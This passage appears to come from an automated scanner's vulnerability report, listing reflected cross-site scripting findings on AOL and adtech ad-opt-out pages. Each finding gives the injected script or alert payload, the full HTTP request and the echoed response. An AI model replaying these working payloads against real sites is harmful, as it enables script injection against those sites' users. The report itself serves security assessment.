<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naiab3fa"-alert(1)-"572cca33a62/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...
4.225. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6425c"><script>alert(1)</script>65983a07482 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.php6425c"><script>alert(1)</script>65983a07482?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:31 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.adtech.de/nai/daa.php6425c"><script>alert(1)</script>65983a07482?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.226. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f97c"-alert(1)-"36048409d74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php8f97c"-alert(1)-"36048409d74?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:35 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php8f97c"-alert(1)-"36048409d74?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...
4.227. http://nai.advertising.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9692"><script>alert(1)</script>06f72de67eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naif9692"><script>alert(1)</script>06f72de67eb/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.advertising.com/naif9692"><script>alert(1)</script>06f72de67eb/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.228. http://nai.advertising.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a45"-alert(1)-"5b625de2fcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai15a45"-alert(1)-"5b625de2fcc/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:50 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai15a45"-alert(1)-"5b625de2fcc/daa.php?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...
4.229. http://nai.advertising.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 941a2"><script>alert(1)</script>cb99d834234 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.php941a2"><script>alert(1)</script>cb99d834234?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:00 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:00 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.advertising.com/nai/daa.php941a2"><script>alert(1)</script>cb99d834234?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481" />
...[SNIP]...
4.230. http://nai.advertising.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdd85"-alert(1)-"956af5ecdb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpcdd85"-alert(1)-"956af5ecdb0?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:49:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpcdd85"-alert(1)-"956af5ecdb0?action_id=3&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...
4.231. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62647"><script>alert(1)</script>cea3e875b13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules62647"><script>alert(1)</script>cea3e875b13/book/book.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:36:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:36:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules62647"><script>alert(1)</script>cea3e875b13/book/book.css?7" />
...[SNIP]...
4.232. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 924f9"-alert(1)-"f8182b9546c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules924f9"-alert(1)-"f8182b9546c/book/book.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:36:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:36:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modules924f9"-alert(1)-"f8182b9546c/book/book.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.233. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b49"><script>alert(1)</script>c4fcd0400fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/booka4b49"><script>alert(1)</script>c4fcd0400fe/book.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:28 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules/booka4b49"><script>alert(1)</script>c4fcd0400fe/book.css?7" />
...[SNIP]...
4.234. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d23fc"-alert(1)-"8e13f419719 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/bookd23fc"-alert(1)-"8e13f419719/book.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:34 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/modules/bookd23fc"-alert(1)-"8e13f419719/book.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising
...[SNIP]...
4.235. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73d0"><script>alert(1)</script>fad8058e80e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/book/book.cssf73d0"><script>alert(1)</script>fad8058e80e?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/modules/book/book.cssf73d0"><script>alert(1)</script>fad8058e80e?7" />
...[SNIP]...
4.236. http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /modules/book/book.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71189"-alert(1)-"209dcf79b99 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/book/book.css71189"-alert(1)-"209dcf79b99?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:41 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
